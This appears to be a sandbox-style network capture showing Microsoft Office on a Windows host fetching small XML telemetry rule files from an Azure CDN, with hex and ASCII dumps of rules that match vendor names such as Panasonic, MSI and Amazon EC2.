2024-12-07 11:59:33 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.7	49764	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:32 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:32 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 22946cbe-b01e-0021-6403-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115932Z-r1cf579d778z4wflhC1EWRa3h0000000029g0000000033t2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:33 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.7	49765	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:34 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:34 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: c11f8514-901e-0048-1305-48b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115934Z-r1cf579d778xr2r4hC1EWRqvfs00000002c0000000001r3x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:34 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.7	49766	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:34 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:34 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: d196cbd9-901e-008f-5d03-4867a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115934Z-r1cf579d778g2t6ghC1EWRfggs00000001t0000000000zwv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:34 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.7	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:34 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:34 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: e267231f-301e-0099-3103-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115934Z-r1cf579d778g2t6ghC1EWRfggs00000001r0000000002aza x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:35 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.7	49768	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:35 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:35 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: d196cbda-901e-008f-5e03-4867a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115935Z-r1cf579d778xq4f9hC1EWRx41g0000000270000000000cz9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:35 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.7	49769	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:35 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:35 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 32c7b88d-b01e-003e-5b01-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115935Z-r1cf579d778qlpkrhC1EWRpfc800000002yg000000002ssh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:35 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.7	49770	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:36 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:36 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 30883f21-801e-00a0-1802-482196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115936Z-r1cf579d7788pwqzhC1EWRrpd800000002g0000000003fax x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:37 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.7	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:36 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:36 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: d23b658c-101e-000b-2402-485e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115936Z-r1cf579d778bb9vvhC1EWRs95400000001ug000000003cwr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:37 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.7	49772	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:36 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:37 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 2968f52d-d01e-002b-1502-4825fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115937Z-r1cf579d778zvkpnhC1EWRv23g00000002p00000000001nv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:37 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.7	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:37 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:37 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 836d2ba0-b01e-0070-7302-481cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115937Z-r1cf579d778t5c2lhC1EWRce3w00000002vg0000000049hz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:37 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.7	49774	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:37 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:37 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 072142d6-401e-0029-0802-489b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115937Z-r1cf579d778qlpkrhC1EWRpfc80000000300000000001uhs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:37 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.7	49776	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:39 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
